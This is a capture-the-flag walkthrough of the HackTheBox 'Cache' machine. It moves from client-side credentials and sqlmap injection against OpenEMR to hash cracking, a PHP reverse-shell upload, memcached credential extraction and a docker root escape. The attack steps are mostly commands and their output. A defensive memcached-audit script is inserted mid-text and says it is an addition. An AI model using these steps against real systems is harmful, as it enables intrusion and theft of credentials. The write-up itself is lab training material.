HackTheBox-Cache-Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap

  • cewl

  • wfuzz

  • sqlmap

  • OpenEMR exploit

  • memcached exploit

  • docker privilege escalation

0x03 Pentesting

Initial Enumeration

nmap scan:

# Nmap 7.80 scan initiated Wed May 20 16:58:59 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 17:00:01 2020 -- 1 IP address (1 host up) scanned in 61.63 seconds

Port 80

The home page gives away nothing useful, and brute-forcing the login form got nowhere:

The Network tab shows the page loading functionality.js:

$(function(){

    var error_correctPassword = false;
    var error_username = false;

    // Both checks run in the browser, so the expected values are readable by anyone who loads the script.
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != '[email protected]_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event){
        /* Act on the event */
        error_correctPassword = false;
        checkCorrectPassword();
        error_username = false;
        checkCorrectUsername();

        if(error_correctPassword == false && error_username == false){
            return true;
        }
        else{
            return false;
        }
    });

});

That gives a username and password, ash:[email protected]_fun. Logging in works but leads nowhere exploitable, so on to the Author page:

Out of ideas, I asked around on the HTB forum. The hint was to run cewl over the author page's text and then fuzz the HOST header.

It turned out that the words on this page, fed through cewl, produce a wordlist that contains the virtual host name:

# kali @ kali in ~/HackTheBox/Cache [16:24:16]
$ cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)

Use wfuzz to find the virtual host:

# kali @ kali in ~/HackTheBox/Cache [16:52:57] 
$ wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================


000000037:   302        0 L      0 W      0 Ch        "HMS"

Total time: 2.130227
Processed Requests: 42
Filtered Requests: 41
Requests/sec.: 19.71620

The options --hc 404 --hh 8193 hide uninteresting responses (by status code and by response length).

Add HMS.htb to /etc/hosts.

HMS.htb

Weak and default credentials fail, so check for public exploits:

There are exploits for many different versions. I tried "OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution", but it requires a valid account. Googling OpenEMR turned up a YouTube video about a related SQL injection vulnerability.

Following the video, first visit http://hms.htb/portal

Click Register, then visit http://hms.htb/portal/add_edit_event_user.php; the eid parameter is vulnerable to SQL injection:

Intercept the request with Burp and save it to req.txt:

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=0bcd8bfgl4rl2sfc8qmg63u09b; PHPSESSID=juj09jki6pu38k34afv60j3vb9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

dump database

Enumerate the databases with sqlmap:

$ sqlmap -r req.txt --dbs --batch
[11:52:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[11:52:46] [INFO] fetching database names
[11:52:47] [INFO] retrieved: 'information_schema'
[11:52:48] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr

Then it's straight sqlmap work: locate the users_secure table and dump its username and password columns:

[12:03:13] [INFO] fetching entries of column(s) '`password`, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username      | password                                                     |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+

Crack the hash with john:

# kali @ kali in ~/HackTheBox/Cache [12:11:02] 
$ sudo john -w=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-05-27 12:11) 1.694g/s 1464p/s 1464c/s 1464C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed

That gives the login credentials openemr_admin:xxxxxx.

upload reverse shell

Upload a reverse shell via the Administration -> Files module, writing it to letter_templates/custom_pdf.php:

Listen on port 4444 locally and open http://hms.htb/sites/default/letter_templates/custom_pdf.php in the browser:

$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.188] 54188
bash: cannot set terminal process group (2111): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/www/hms.htb/public_html/sites/default/letter_templates$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting User Access

Poking around the box as www-data reveals an ash user. Try password reuse by switching to ash with the credentials from functionality.js:

[email protected]:/var/www$ su ash
su ash
Password: [email protected]_fun
[email protected]:/var/www$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash)
[email protected]:~$ cat user.txt
cat user.txt
93bf------------------------8dfe

memcached exploit

Check the locally listening services:

[email protected]:~$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -

Port 11211 is memcached. Exploitation technique (a new one for me):

https://www.hackingarticles.in/penetration-testing-on-memcached-server/

https://niiconsulting.com/checkmate/2013/05/memcache-exploit/

Fetch the slab statistics:

[email protected]:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'
stats slabs
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 5
STAT 1:free_chunks 10917
STAT 1:free_chunks_end 0
STAT 1:mem_requested 371
STAT 1:get_hits 1
STAT 1:cmd_set 7730
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048576
END

List the items stored in each slab by slab id:

stats items
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 52
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 220
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 7735
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 1
STAT items:1:hits_to_temp 0
END

Dump all the keys:

stats cachedump 1 0
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

Read the user and passwd keys:

get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
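Treating the dump above as audit input rather than loot: the following Python, an added example that is not part of the original write-up, parses "stats cachedump" output (the sample is the text shown above, embedded as a constructed string) and flags credential-looking keys stored with no expiry, which is what a defender reviewing a memcached instance would want to catch. The key-name pattern is an assumption.

```python
"""Audit helper for memcached 'stats cachedump' output (added example)."""
import re

# Constructed sample: the cachedump output shown in the write-up.
CACHEDUMP_OUTPUT = """\
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
"""

# Format of each line: ITEM <key> [<bytes> b; <expiry> s]
# <expiry> is an absolute unix time, or 0 when the item never expires.
ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")

# Assumed pattern for key names that should not sit in a plain cache.
SENSITIVE_KEY_RE = re.compile(r"pass|pwd|secret|token|account", re.I)


def parse_cachedump(text):
    """Return {key: (size_bytes, expiry)} for every ITEM line up to END."""
    items = {}
    for line in text.splitlines():
        line = line.strip()
        if line == "END":
            break
        m = ITEM_RE.match(line)
        if m:
            items[m.group(1)] = (int(m.group(2)), int(m.group(3)))
    return items


def find_risky_items(items):
    """Keys with a credential-like name that never expire (expiry == 0)."""
    return sorted(k for k, (_, expiry) in items.items()
                  if expiry == 0 and SENSITIVE_KEY_RE.search(k))


if __name__ == "__main__":
    parsed = parse_cachedump(CACHEDUMP_OUTPUT)
    for key in find_risky_items(parsed):
        size, _ = parsed[key]
        print(f"{key}: {size} bytes, never expires -> review why this is cached")
```

Feeding it the output of "stats items" first would tell you which slab ids to dump; cachedump is limited to one slab per call.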

SSH login:

$ ssh [email protected]
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
[email protected]'s password:
[email protected]:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

Note that luffy is a member of the docker group.

Getting Root Access

GTFObins docker

List the docker images:

[email protected]:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        8 months ago        64.2MB

Escalate privileges using the method from GTFObins:

[email protected]:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/# cd
[email protected]:~# cat root.txt
32fc------------------------ceab

0x04 Reference

Topic                          URL
OpenEMR vulnerability (video)  https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s
Memcached                      https://www.hackingarticles.in/penetration-testing-on-memcached-server/
Memcached                      https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
Docker                         https://gtfobins.github.io/gtfobins/docker/


This article was first published on the WeChat public account 星盟安全: HackTheBox-Cache-Walkthrough
